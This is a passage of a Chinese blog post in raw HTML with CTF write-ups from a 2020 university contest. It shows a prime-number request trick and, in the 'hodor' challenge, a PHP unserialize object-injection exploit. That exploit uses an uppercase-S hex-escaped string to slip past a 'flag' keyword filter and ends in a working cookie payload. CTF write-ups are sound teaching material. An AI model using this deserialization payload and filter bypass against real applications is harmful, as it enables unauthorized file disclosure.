        $<span class="token punctuation">(</span><span class="token string">".num"</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">css</span><span class="token punctuation">(</span><span class="token string">'background-position'</span><span class="token punctuation">,</span> <span class="token string">'11px 0'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">var</span> result <span class="token operator">=</span> <span class="token function">numRand</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">var</span> num_arr <span class="token operator">=</span> <span class="token punctuation">(</span>result <span class="token operator">+</span> <span class="token string">''</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">split</span><span class="token punctuation">(</span><span class="token string">''</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        $<span class="token punctuation">(</span><span class="token string">".num"</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">each</span><span class="token punctuation">(</span><span class="token keyword">function</span> <span class="token punctuation">(</span>index<span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token keyword">var</span> _num <span class="token operator">=</span> $<span class="token punctuation">(</span>this<span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token keyword">var</span> yPos <span class="token operator">=</span> <span class="token punctuation">(</span>u <span class="token operator">*</span> <span class="token number">60</span><span class="token punctuation">)</span> <span class="token operator">-</span> <span class="token punctuation">(</span>u <span class="token operator">*</span> num_arr<span class="token punctuation">[</span>index<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token function">setTimeout</span><span class="token punctuation">(</span><span class="token keyword">function</span> <span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
                _num<span class="token punctuation">.</span><span class="token function">animate</span><span class="token punctuation">(</span><span class="token punctuation">{</span>
                    backgroundPosition<span class="token punctuation">:</span> <span class="token string">'11px '</span> <span class="token operator">+</span> yPos <span class="token operator">+</span> <span class="token string">'px'</span>
                <span class="token punctuation">}</span><span class="token punctuation">,</span> <span class="token punctuation">{</span>
                    duration<span class="token punctuation">:</span> <span class="token number">6000</span> <span class="token operator">+</span> index <span class="token operator">*</span> <span class="token number">3000</span><span class="token punctuation">,</span>
                    easing<span class="token punctuation">:</span> <span class="token string">"easeInOutCirc"</span><span class="token punctuation">,</span>
                    complete<span class="token punctuation">:</span> <span class="token keyword">function</span> <span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
                        <span class="token keyword">if</span> <span class="token punctuation">(</span>index <span class="token operator">==</span> <span class="token number">3</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
                            isBegin <span class="token operator">=</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
                            <span class="token function">check</span><span class="token punctuation">(</span>result<span class="token punctuation">)</span><span class="token punctuation">;</span>
                        <span class="token punctuation">}</span>
                    <span class="token punctuation">}</span>
                <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token punctuation">}</span><span class="token punctuation">,</span> index<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span></code></pre>
<p>发现每次摇都是向check.php发个数字，看到isPrimeNum（）函数要求num是质数，burpsuite抓包然后发一个num质数就得到flag</p>
<h3 id="hodor"><a href="#hodor" class="headerlink" title="hodor"></a>hodor</h3><p><img src="../../../../medias/img/image-20201023213026199.png" alt="image-20201023213026199"></p>
<p>得到源码</p>
<pre class=" language-php"><code class="language-php">
<span class="token delimiter">&lt;?php</span>

<span class="token keyword">Class</span> <span class="token class-name">Source</span> <span class="token punctuation">{</span>
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__toString</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">return</span> <span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token string">'license.txt'</span><span class="token punctuation">,</span> <span class="token boolean">true</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">source</span><span class="token punctuation">,</span> <span class="token boolean">true</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>

<span class="token keyword">function</span> <span class="token function">easy_check</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token comment" spellcheck="true">//echo $str;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string">"/flag/i"</span><span class="token punctuation">,</span> <span class="token variable">$str</span><span class="token punctuation">,</span> <span class="token variable">$matches</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">return</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">return</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>

<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'source'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token variable">$s</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Source</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$s</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">source</span> <span class="token operator">=</span> <span class="token constant">__FILE__</span><span class="token punctuation">;</span>

    <span class="token keyword">echo</span> <span class="token variable">$s</span><span class="token punctuation">;</span>
    exit<span class="token punctuation">;</span>
<span class="token punctuation">}</span>

<span class="token variable">$todos</span> <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">;</span>

<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">isset</span><span class="token punctuation">(</span><span class="token variable">$_COOKIE</span><span class="token punctuation">[</span><span class="token string">'todos'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token operator">!</span><span class="token function">easy_check</span><span class="token punctuation">(</span><span class="token variable">$_COOKIE</span><span class="token punctuation">[</span><span class="token string">'todos'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">echo</span> <span class="token string">"Hacker!\n"</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span>
        <span class="token variable">$c</span> <span class="token operator">=</span> <span class="token variable">$_COOKIE</span><span class="token punctuation">[</span><span class="token string">'todos'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token variable">$h</span> <span class="token operator">=</span> <span class="token function">substr</span><span class="token punctuation">(</span><span class="token variable">$c</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token number">32</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$m</span> <span class="token operator">=</span> <span class="token function">substr</span><span class="token punctuation">(</span><span class="token variable">$c</span><span class="token punctuation">,</span> <span class="token number">32</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">md5</span><span class="token punctuation">(</span><span class="token variable">$m</span><span class="token punctuation">)</span> <span class="token operator">===</span> <span class="token variable">$h</span><span class="token punctuation">)</span><span class="token punctuation">{</span> <span class="token comment" spellcheck="true">//这里只需将反序列化的字符串32位md5加密，再加上原字符串即可</span>
            <span class="token variable">$todos</span> <span class="token operator">=</span> <span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$m</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>

<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">isset</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string">'text'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token variable">$todo</span> <span class="token operator">=</span> <span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string">'text'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>

    <span class="token variable">$todos</span><span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token variable">$todo</span><span class="token punctuation">;</span>
    <span class="token variable">$m</span> <span class="token operator">=</span> <span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$todos</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$h</span> <span class="token operator">=</span> <span class="token function">md5</span><span class="token punctuation">(</span><span class="token variable">$m</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token function">setcookie</span><span class="token punctuation">(</span><span class="token string">'todos'</span><span class="token punctuation">,</span> <span class="token variable">$h</span><span class="token punctuation">.</span><span class="token variable">$m</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">header</span><span class="token punctuation">(</span><span class="token string">'Location: '</span><span class="token punctuation">.</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string">'REQUEST_URI'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    exit<span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token comment" spellcheck="true">// flag is in flag.php</span>
<span class="token delimiter">?></span> 



<span class="token delimiter">&lt;?php</span> <span class="token keyword">foreach</span><span class="token punctuation">(</span><span class="token variable">$todos</span> <span class="token keyword">as</span> <span class="token variable">$todo</span><span class="token punctuation">)</span><span class="token punctuation">:</span><span class="token delimiter">?></span>
    <span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>li</span><span class="token punctuation">></span></span></span><span class="token delimiter">&lt;?</span><span class="token operator">=</span><span class="token variable">$todo</span><span class="token delimiter">?></span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>li</span><span class="token punctuation">></span></span></span>
<span class="token delimiter">&lt;?php</span> <span class="token keyword">endforeach</span><span class="token punctuation">;</span><span class="token delimiter">?></span> </code></pre>
<p>只需要控制source的值即可</p>
<pre class=" language-php"><code class="language-php">    <span class="token delimiter">&lt;?php</span>
    <span class="token keyword">Class</span> <span class="token class-name">Source</span><span class="token punctuation">{</span>
        <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__toString</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
        <span class="token punctuation">{</span>
            <span class="token keyword">return</span> <span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token string">'license.txt'</span><span class="token punctuation">,</span> <span class="token boolean">true</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">source</span><span class="token punctuation">,</span> <span class="token boolean">true</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
    <span class="token punctuation">}</span>

       <span class="token variable">$s</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Source</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
       <span class="token variable">$s</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">source</span> <span class="token operator">=</span> <span class="token string">"flag.php"</span><span class="token punctuation">;</span>
       <span class="token variable">$s</span> <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token variable">$s</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
       <span class="token keyword">echo</span> <span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$s</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">//a:1:{i:0;O:6:"Source":1:{s:6:"source";s:8:"flag.php";}}</span>

<span class="token delimiter">?></span></code></pre>
<p>但是还是check了flag字符串，payload中不能出现flag</p>
<p>有个小trick</p>
<blockquote>
<h3 id="string-型数据的序列化"><a href="#string-型数据的序列化" class="headerlink" title="string 型数据的序列化"></a><a href="https://www.neatstudio.com/show-161-1.shtml" target="_blank" rel="noopener">string 型数据的序列化</a></h3><p>s:<code>&lt;length&gt;</code>:”<code>&lt;value&gt;</code>“;</p>
<p>其中 <code>&lt;length&gt;</code> 是 <code>&lt;value&gt; </code>的长度，<code>&lt;length&gt; </code> 是非负整数，数字前可以带有正号（+）。<code>&lt;value&gt; </code>为字符串值，这里的每个字符都是单字节字符，其范围与 ASCII 码的 0 -  255 的字符相对应。每个字符都表示原字符含义，没有转义字符，<code>&lt;value&gt;</code> 两边的引号（””）是必须的，但不计算在  <code>&lt;length&gt;</code> 当中。这里的 <value> 相当于一个字节流，而 <code>&lt;length&gt;</code>  是这个字节流的字节个数。</value></p>
<p>S:<code>&lt;length&gt;</code>:”<code>&lt;value&gt;</code>“;</p>
<p>其中 <code>&lt;length&gt; </code>是源字符串的长度，而非<code>  &lt;value&gt;</code> 的长度。<code>&lt;length&gt;</code> 是非负整数，数字前可以带有正号（+）。<code>&lt;value&gt;</code> 为经过转义之后的字符串。</p>
<p>它的转义编码很简单，对于 ASCII 码小于 128 的字符（但不包括 \），按照单个字节写入（与 s 标识的相同），对于 128~255 的字符和 \ 字符，则将其 ASCII 码值转化为 16 进制编码的字符串，以 \ 作为开头，后面两个字节分别是这个字符的 16  进制编码，顺序按照由高位到低位排列，也就是第 8-5 位所对应的16进制数字字符（abcdef 这几个字母是小写）作为第一个字节，第 4-1  位作为第二个字节。依次编码下来，得到的就是 <code>&lt;value&gt;</code> 的内容了。</p>
</blockquote>
<p>所以将s改为S，flag.php用16进制\66\6c\61\67\2e\70\68\70表示</p>
<p>cookie在存储时，存储的是url编码后的数据，调用cookie时，会先进行url解码，所以将payload先url编码一次</p>
<p>最终payload</p>
<pre class=" language-php"><code class="language-php">todos<span class="token operator">=</span>a170de677c96a2097c4d580cea16e0cba<span class="token punctuation">:</span><span class="token number">1</span><span class="token punctuation">:</span><span class="token operator">%</span>7Bi<span class="token punctuation">:</span><span class="token number">0</span><span class="token punctuation">;</span>O<span class="token punctuation">:</span><span class="token number">6</span><span class="token punctuation">:</span><span class="token operator">%</span>22Source<span class="token operator">%</span><span class="token number">22</span><span class="token punctuation">:</span><span class="token number">1</span><span class="token punctuation">:</span><span class="token operator">%</span>7Bs<span class="token punctuation">:</span><span class="token number">6</span><span class="token punctuation">:</span><span class="token operator">%</span>22source<span class="token operator">%</span><span class="token number">22</span><span class="token punctuation">;</span>S<span class="token punctuation">:</span><span class="token number">8</span><span class="token punctuation">:</span><span class="token operator">%</span><span class="token number">22</span><span class="token operator">%</span><span class="token constant">5C66</span><span class="token operator">%</span>5C6c<span class="token operator">%</span><span class="token constant">5C61</span><span class="token operator">%</span><span class="token constant">5C67</span><span class="token operator">%</span>5C2e<span class="token operator">%</span><span class="token constant">5C70</span><span class="token operator">%</span><span class="token constant">5C68</span><span class="token operator">%</span><span class="token constant">5C70</span><span class="token operator">%</span><span class="token number">22</span><span class="token punctuation">;</span><span class="token operator">%</span><span class="token constant">7D</span><span class="token operator">%</span><span class="token constant">7D</span></code></pre>
<p>加在cookie中提交即可</p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Meteo</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://meteoweb.top/2020/10/23/cumtctf2020-shi-yue-xiao-sai/">https://meteoweb.top/2020/10/23/cumtctf2020-shi-yue-xiao-sai/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Meteo</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/CTF/">
                                    <span class="chip bg-color">CTF</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2020/10/23/cumtctf2020-shi-yue-xiao-sai/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/17.jpg" class="responsive-img" alt="Cumt2020十月校赛 by 水一水">
                        
                        <span class="card-title">Cumt2020十月校赛 by 水一水</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            REhello word拖到IDA中查看，打开sub_40156F函数对此代码分析，a1为输入的字符串，查看byte_403020和aIsEasyRight。写一个python脚本推出a1。得到Flag
non_name1、拖进IDA分析代
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-10-23
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/cumtCTF/" class="post-category">
                                    cumtCTF
                                </a>
                            
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/CTF/">
                        <span class="chip bg-color">CTF</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2020/09/26/cumtctf2020-jiu-yue-xiao-sai/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/13.jpg" class="responsive-img" alt="Cumt2020九月校赛 by 水一水">
                        
                        <span class="card-title">Cumt2020九月校赛 by 水一水</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            MSIC连签到都算不上题目给出一个压缩包，看到里面txt，猜是base64加密后图片，解码后得到一个二维码，然后扫码得到\u开头的字符串，用java输出得到字符串，再用核心价值观解码，得到flag。
真·签到题
题目给了一个压缩包，猜测是伪
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-09-26
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/CTF/" class="post-category">
                                    CTF
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/CTF/">
                        <span class="chip bg-color">CTF</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->

<style type="text/css">
code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }
</style>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2019</span>
            <a href="/about" target="_blank">Meteo</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">12.9k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2019";
                    var startMonth = "09";
                    var startDate = "28";
                    var startHour = "0";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/meteoxs" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:meteoxs@foxmail.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>













</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("/search.xml", 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
